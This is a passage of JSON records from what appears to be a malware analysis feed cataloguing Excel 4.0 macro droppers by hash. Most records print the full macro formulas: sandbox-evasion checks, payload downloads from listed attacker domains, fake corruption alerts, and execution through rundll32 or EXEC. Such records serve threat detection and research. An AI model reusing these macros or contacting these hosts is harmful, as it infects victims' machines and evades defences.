Macro","attr":{"formulas":"WORKBOOK.HIDE(\"gUAXyqfM3N\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1da85e9a042b7cad10ced85376cf825d059f453636b065ec86e8b8e3c8cd618a"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1da85e9a042b7cad10ced85376cf825d059f453636b065ec86e8b8e3c8cd618a","filesize":160768,"md5":"510bd7db297be5c5f1681196ccc2d648","sha1":"5bf73ab31cc2f662390afffa7be333b7d9c30df9","sha256":"1da85e9a042b7cad10ced85376cf825d059f453636b065ec86e8b8e3c8cd618a","sha512":"c7b7504da6c673367920908206b35b5e5a180e872cef975972c918382acda35ff6291fc572f9836dd54202795a998459b0ceeba163fde60c250676f17574b59e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1da85e9a042b7cad10ced85376cf825d059f453636b065ec86e8b8e3c8cd618a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WbfMpjLGem\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1db53a9a451a6d7861f86228a26a138289c8f8f722b47507f561b36e21779163"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1db53a9a451a6d7861f86228a26a138289c8f8f722b47507f561b36e21779163","filesize":225280,"md5":"46a481b5825d759407bb226afa18649f","sha1":"28ad4f6fcc08210879c874ca5b9a5d2fc2ef596e","sha256":"1db53a9a451a6d7861f86228a26a138289c8f8f722b47507f561b36e21779163","sha512":"5115d746876015c773387b99a19c2651ad5694146fa0040555f592873e2d3ec15da6f3085ccf3ed4ee58dde296c0aefaaea4137b7bcf0f85410c5532381eea87","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1db53a9a451a6d7861f86228a26a138289c8f8f722b47507f561b36e21779163.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xPYXuaqQYs\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1dc0a45a1056a778504f7d23242dad6c8d1f75f58658dc8ea20fc30a8a1f6e1c"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1dc0a45a1056a778504f7d23242dad6c8d1f75f58658dc8ea20fc30a8a1f6e1c","filesize":112128,"md5":"760e3df855c6a2d2769f3037a53118b5","sha1":"b37f11ecd51cd39bbf420052b0d3dace70bb6905","sha256":"1dc0a45a1056a778504f7d23242dad6c8d1f75f58658dc8ea20fc30a8a1f6e1c","sha512":"a3a36d5b8dc2a53c755e19b192fcc55416de1b18a104129139f84e3ee68b2934b2438a45a9e9d97f0a78c40241ff13ad506a344fc4fd6020d37315a37aa305ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1dc0a45a1056a778504f7d23242dad6c8d1f75f58658dc8ea20fc30a8a1f6e1c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1dd7ca0263fb03fdb5c9efb6173376fdec2f8437adde48abe024eb3bd17cd56c"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1dd7ca0263fb03fdb5c9efb6173376fdec2f8437adde48abe024eb3bd17cd56c","filesize":214528,"md5":"8d52f4ede32b7a6774212cb1afda5d53","sha1":"7f9143023e5cf28cbe1d6123b303cb44b31084d2","sha256":"1dd7ca0263fb03fdb5c9efb6173376fdec2f8437adde48abe024eb3bd17cd56c","sha512":"63b41bad61bea93f117be6fa534fa95d1d32012ea0f3e40b7aa552a33084f960f5902cf4cae6bff626dabbfe15355ed45e72843cc5a31c1cc7b0ba2a32a74694","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1dd7ca0263fb03fdb5c9efb6173376fdec2f8437adde48abe024eb3bd17cd56c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rYcUKiqlzi\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ddd2db3fdbf6d839cda839fe35fc05c1ced52f51539b47637586d9104a86095"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1ddd2db3fdbf6d839cda839fe35fc05c1ced52f51539b47637586d9104a86095","filesize":209408,"md5":"7f047a969f2e073fe639f612b84c13d4","sha1":"2d0d5eebb9889612b1a205c6a93d2886deb0025a","sha256":"1ddd2db3fdbf6d839cda839fe35fc05c1ced52f51539b47637586d9104a86095","sha512":"c84e3648ec2c17eb9c0f50b6bfb429c3c79a3fa1f17694a53e73f66678231c70cee3ab4229a2e5c1da81f1f254df226d83076f2a4e5b44f05e5abff9fea5c5e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ddd2db3fdbf6d839cda839fe35fc05c1ced52f51539b47637586d9104a86095.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oaGyDmOlzt\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1dddeabfe356d05bb1fd8c04e011e04381077471564ed14b5684fc67e973db20"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1dddeabfe356d05bb1fd8c04e011e04381077471564ed14b5684fc67e973db20","filesize":185344,"md5":"ebad84bd7ce689c6e783e68714b17a1d","sha1":"b25566e015e1b3b633831a49fc798fc5f45f48d2","sha256":"1dddeabfe356d05bb1fd8c04e011e04381077471564ed14b5684fc67e973db20","sha512":"b93bf519278cfc4aef19de01f9ad9f703f128eb0dc2204dae807298081680df541bfad03943503f6af26fd6e9f4d41c4e930769c358c55b8fbbd16bf3f6219df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1dddeabfe356d05bb1fd8c04e011e04381077471564ed14b5684fc67e973db20.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1de819e68c6b2437381ada6776a963facedaa32d9877d0b8574617802e665152"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1de819e68c6b2437381ada6776a963facedaa32d9877d0b8574617802e665152","filesize":225280,"md5":"0064d0fa6ca62c89be05bf0e492bbb2b","sha1":"f4c6965bfd9498b2d60a373419b499c823709724","sha256":"1de819e68c6b2437381ada6776a963facedaa32d9877d0b8574617802e665152","sha512":"0c864670797d6a3057c182bf8c74ee8415267284edef6d653b71646d1e175bddb8fd4dd6f6d5f42b9023539f6458c7e9b77ee51e89ccb0569d99f7605f045624","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1de819e68c6b2437381ada6776a963facedaa32d9877d0b8574617802e665152.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HV6urARXog\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e01499b81aae2e5dcb06320acf1fa93d257de0d4ca3dbd64790c36bfff6b2f6"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1e01499b81aae2e5dcb06320acf1fa93d257de0d4ca3dbd64790c36bfff6b2f6","filesize":141824,"md5":"76de6c4a9dcfe0ec3678fba86f3a97da","sha1":"f532741b6eb4896b1cee717bd7a3b8020fc9809d","sha256":"1e01499b81aae2e5dcb06320acf1fa93d257de0d4ca3dbd64790c36bfff6b2f6","sha512":"8fccb1f2a0f809a540eda2658785667cd0c1e8b00495e96ffd27dacd60d32b10c989bc97b06bef3289de0a8318948baa6fe0bddcb8ab5d80550614ef81fc0147","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e01499b81aae2e5dcb06320acf1fa93d257de0d4ca3dbd64790c36bfff6b2f6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"uQvcS5GAUE\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e14613f6542ea14d612cc2ec5242d28cc6fc037e0d4fb1988cf6a7337b8beb3"},"analysis":{"reported":"2020-04-09T16:15:13Z","score":10},"files":[{"filename":"1e14613f6542ea14d612cc2ec5242d28cc6fc037e0d4fb1988cf6a7337b8beb3","filesize":113664,"md5":"15fe728ed981264427cae2dfdfe03869","sha1":"54df583ae2514afb1e0d43032cd725445c517f2c","sha256":"1e14613f6542ea14d612cc2ec5242d28cc6fc037e0d4fb1988cf6a7337b8beb3","sha512":"85a493731445d6a309b182cf7fc8749e6f6d94758837880fce566031d936e60ea2c551b9433661119bdda9884df6471154288cdf68d1bb43a92ed0a865ae9fb1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e14613f6542ea14d612cc2ec5242d28cc6fc037e0d4fb1988cf6a7337b8beb3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"wMepesR2mc\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e21f1c79a576b578ea13b57d8ac1d837c7aa0891025ff5016dca427dfff538a"},"analysis":{"reported":"2020-04-09T16:15:13Z","score":10},"files":[{"filename":"1e21f1c79a576b578ea13b57d8ac1d837c7aa0891025ff5016dca427dfff538a","filesize":214016,"md5":"18a676c89c6a4d097b887a4801270672","sha1":"fd58531d26183145c0daf56a570db79e973c3110","sha256":"1e21f1c79a576b578ea13b57d8ac1d837c7aa0891025ff5016dca427dfff538a","sha512":"7dbf1ef30fecd7580bd4147018ccb3c26ec8db09b4bbe11aca20a8d476495567fbad59b67a2075b059cc1e3936e649b475c94f2fbf8277df2b818658cdeb9ce2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e21f1c79a576b578ea13b57d8ac1d837c7aa0891025ff5016dca427dfff538a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9Jenq65DTg\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e39c9233280a4fd277793e78acea6c0934c08944e863c72e26d46bcc9f60361"},"analysis":{"reported":"2020-04-09T16:15:13Z","score":10},"files":[{"filename":"1e39c9233280a4fd277793e78acea6c0934c08944e863c72e26d46bcc9f60361","filesize":170496,"md5":"f3cdfa2514004fbdac6815328908a7e4","sha1":"b3f5b8ba0c0fd1f055bdde54e0026c0b7f523366","sha256":"1e39c9233280a4fd277793e78acea6c0934c08944e863c72e26d46bcc9f60361","sha512":"7146b11c9ba29f647501562eb6bd7ce7e8626d3db4ac5dd8100c91a19e9ac1da3c682c6dcf0b71b50dfe434d1fa8dd1397fe1f9a0c2e2ac388d70d9ef1e94b6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e39c9233280a4fd277793e78acea6c0934c08944e863c72e26d46bcc9f60361.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KYdagRAS1c\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e3e6ddc4f873dba212fdecf0edef5065b3cd20bc71b1305bde379320d640bb0"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e3e6ddc4f873dba212fdecf0edef5065b3cd20bc71b1305bde379320d640bb0","filesize":209920,"md5":"5bee0678e074b6968c97011ba3e50c35","sha1":"169c8a8fe8153f827e174effd1baf9d993469e85","sha256":"1e3e6ddc4f873dba212fdecf0edef5065b3cd20bc71b1305bde379320d640bb0","sha512":"d4836769fcc7a0e40d1a4de53a8286548971ca3ec736c75b7e02c1fac9e7b8a068ebf7918b9108f6c9d82188a8018fa7212b3d60dbe951f4dcdb86a2cd18e90c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e3e6ddc4f873dba212fdecf0edef5065b3cd20bc71b1305bde379320d640bb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7lfB5715XA\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e49b3e2bd4b50a88773715d1814fbbb70dd000a2e9f4a4b2e41c9f91061bd1f"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e49b3e2bd4b50a88773715d1814fbbb70dd000a2e9f4a4b2e41c9f91061bd1f","filesize":167936,"md5":"0f056b53c55f4a654259204bf4e00daa","sha1":"83d1154302adf132c4433bc4ceb5ce253ec37fa3","sha256":"1e49b3e2bd4b50a88773715d1814fbbb70dd000a2e9f4a4b2e41c9f91061bd1f","sha512":"d7f202be29970667a7d24e5d9f6b34d7d3e7c40dc4b0dc5e4057be0daa8d65eea856fdc079be6e3daf9f8efdf97d6f881635d10391bf9453035bcdb011614b05","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e49b3e2bd4b50a88773715d1814fbbb70dd000a2e9f4a4b2e41c9f91061bd1f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UOgbepNcN5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e4ac9688a86b3582f910c8d8acd2151299e954bc36a70e5748b1e5318c7c0d1"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e4ac9688a86b3582f910c8d8acd2151299e954bc36a70e5748b1e5318c7c0d1","filesize":109568,"md5":"d00c9a4d67380cf6d02bf50287503c16","sha1":"df7834e0542123d69ac28db3ec0082fb7f377f20","sha256":"1e4ac9688a86b3582f910c8d8acd2151299e954bc36a70e5748b1e5318c7c0d1","sha512":"80bea4608b019ed4bfb0553c44beb87562bd83933f2c8ca00e770eb11aa5eed52c0f50717f9125e4dd850de4a80d29296883dfbcef8ce7f6a4e455b5aebf4138","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e4ac9688a86b3582f910c8d8acd2151299e954bc36a70e5748b1e5318c7c0d1.xls"}],"unpack_count":0,"error_c